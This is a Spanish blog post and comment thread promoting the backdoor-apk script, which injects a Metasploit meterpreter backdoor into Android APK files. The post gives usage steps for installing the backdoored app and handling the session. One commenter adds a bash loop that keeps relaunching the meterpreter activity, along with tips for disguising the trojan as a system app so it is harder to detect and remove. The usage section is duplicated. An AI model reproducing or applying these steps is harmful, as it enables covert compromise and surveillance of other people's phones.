Backdoor-apk es un script en bash de Dana James que simplifica el proceso de agregar un backdoor a cualquier archivo APK de Android. Si tienes algunos conocimientos prácticos de Linux, bash, Metasploit, Apktool, el SDK de Android, smali, etc. te recomendamos echar un vistazo al código y descubrirás lo sencillo pero práctico que es:
https://github.com/dana-at-cp/backdoor-apk/blob/master/backdoor-apk/backdoor-apk.sh
Por supuesto, este script se proporciona tal cual, sin garantía de ningún tipo y está destinado únicamente a fines educativos.
Uso:
Encontrarás el APK recompilado en el directorio 'original/dist'. Instala luego el APK en un dispositivo Android compatible, ejecútalo y maneja la conexión meterpreter a través del script de recursos generado: msfconsole -r backdoor-apk.rc
Proyecto: https://github.com/dana-at-cp/backdoor-apk
https://github.com/dana-at-cp/backdoor-apk/blob/master/backdoor-apk/backdoor-apk.sh
Por supuesto, este script se proporciona tal cual, sin garantía de ningún tipo y está destinado únicamente a fines educativos.
Uso:
Encontrarás el APK recompilado en el directorio 'original/dist'. Instala luego el APK en un dispositivo Android compatible, ejecútalo y maneja la conexión meterpreter a través del script de recursos generado: msfconsole -r backdoor-apk.rc
Proyecto: https://github.com/dana-at-cp/backdoor-apk
unfortunately the app has stopped. Alguna solución? Demasiado facil para ser cierto.
ResponderEliminarpuedes especificar un poco más el detalle del error, entorno, etc.?
EliminarI9300 CM 13.0 Android 6.0, Tablet Orinoquia Android 4.4.2, Note4 Android 5.0.1. En todos los dispositivos se detiene la ejecucion de la apk justo despues de ser instalada.
ResponderEliminarhttps://i.stack.imgur.com/wSKz6.png Exactamente esto mismo pero con cualquier apk que use hasta con la original que usan en ese ejemplo mayormente el ccleaner. También sucede así con TheFatRAT, apk_binder_script, apk-embed-payload, the-backdoor-factory todas en github; y meterpreter solo es el único que saca la cara pero esta demasiado evidente el MainActivity, la conexión se cierra tras pocos segundos Reason: Die. Con este script se mejora la situación un poco
ResponderEliminar--------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
----------------------------------------------------------------------
Pero se debe seguir perfeccionando la práctica, por último lograr a convertir una apk en apk del sistema o system con link2sd ayuda full a hacer mas difícil la detección por un novato o la elimnacion del backdoor o troyano. Increíblemente sigo obteniendo mejores resultados de pruebas controladas y autorizadas con AndroRAT siendo pionero en este tema. Desconozco si google ha parcheado este tema de los binder o emdeb apk :(. Gracias por la ayuda excelente artículo pero me temo que estamos en enfrentando otros niveles de seguridad.
Hola, el script funciona perfectamente.
ResponderEliminarSi estás usando Kali Linux. Deberías asegurarte que tienes las dependencias instaladas.
apt-get update
apt-get install lib32zl lib32ncurses5
Un saludo.
parece esse erro: Check your environment and configuration. Couldn't find: third-party/android-string-obfuscator/lib/aso
ResponderEliminar